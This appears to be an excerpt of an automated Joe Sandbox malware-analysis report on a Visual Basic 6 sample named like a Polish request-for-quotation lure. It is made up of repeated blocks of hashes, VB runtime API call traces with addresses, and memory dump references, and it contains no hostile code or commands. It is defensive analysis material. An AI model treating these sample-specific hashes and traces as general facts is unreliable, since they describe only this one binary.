                                                                                                                                                                                                                                                      • Opcode ID: 07de24749f671f96814f1a4586ac660af873eea27dc505617471f5a8f1a16d63
                                                                                                                                                                                                                                                      • Instruction ID: 6a6c65185a8990ed76a7925615099f76a1e8909006d367d433fa78fd926de25a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07de24749f671f96814f1a4586ac660af873eea27dc505617471f5a8f1a16d63
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70318071A00158DFCB14DBE4ED84DEE7B79EF88300B10456AE505E3261DA345986CF68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,00000000,6CF7A323,6CF8D8B1,6CF8D8E2), ref: 00417B35
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1701566546-0
                                                                                                                                                                                                                                                      • Opcode ID: 77e56cfcc552817e7ee37a59d80ef930704b94eed13a9294e71aa4068a8ebed6
                                                                                                                                                                                                                                                      • Instruction ID: 866caa4c8eac6f19f1194a02b11e2fb1ed896fcf014f3bed80b5db7ea06780d3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77e56cfcc552817e7ee37a59d80ef930704b94eed13a9294e71aa4068a8ebed6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A53160B1A00158DFCB14DBA4ED94DEE7B79EF88300F10856AE506A3261DB345986CF68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,00000000,6CF7A323,6CF8D8B1,6CF8D8E2), ref: 00417B35
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1701566546-0
                                                                                                                                                                                                                                                      • Opcode ID: 7c020b0f20d6a8b4d01058b6d9886427e5cc45ac16c8490aeb7492273ba51688
                                                                                                                                                                                                                                                      • Instruction ID: b6ea956760585b48cef5c944cb0b6b88b320cc0c6bf33020a7601fb965c6dcd1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c020b0f20d6a8b4d01058b6d9886427e5cc45ac16c8490aeb7492273ba51688
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B33172B1A00118DFCB14DFA4ED84DEE7779EF88300F10456AE506E3261DB345986CF68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,00000000,6CF7A323,6CF8D8B1,6CF8D8E2), ref: 00417B35
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1701566546-0
                                                                                                                                                                                                                                                      • Opcode ID: 02c7f454d40560d9c6661f647330d47c8efe8f1cef0e828d259a4e05a1306448
                                                                                                                                                                                                                                                      • Instruction ID: 4ac9cb3760513d78d10cab075c76733cbf34af43b16f8391a80bd0b5696eddcc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02c7f454d40560d9c6661f647330d47c8efe8f1cef0e828d259a4e05a1306448
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57316071A00159DFCB14DFA4ED84DEEBB79EF88300F50456AE506A3261DB346986CF98
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,00000000,6CF7A323,6CF8D8B1,6CF8D8E2), ref: 00417B35
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1701566546-0
                                                                                                                                                                                                                                                      • Opcode ID: 94c476b80a82efe6d398e93fd76fd4f9bee1e122c1bd37c77481171981cade68
                                                                                                                                                                                                                                                      • Instruction ID: 685c137c93b8fd798157623ef34c738d9d6605c7449a0796629f3e9ff1c3c11f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94c476b80a82efe6d398e93fd76fd4f9bee1e122c1bd37c77481171981cade68
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 383160B1A00158DFCB14DBA4ED84DEEB779FF88300B10456AE506E3261DB345986CFA8
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,00000000,6CF7A323,6CF8D8B1,6CF8D8E2), ref: 00417B35
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1701566546-0
                                                                                                                                                                                                                                                      • Opcode ID: 8bb761deafcd7e2ded91a160ce823c526f59d3b1b33068874666e1dc9ed13cd2
                                                                                                                                                                                                                                                      • Instruction ID: abceff13d7d3de1d96dc032862a960644500f493d2a40e7a9fa547c81a193ae3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8bb761deafcd7e2ded91a160ce823c526f59d3b1b33068874666e1dc9ed13cd2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 463160B1A00118DFCB14DFA4ED94DEEBB79EF88300B10456AE506E3261DB745986CF68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041775F
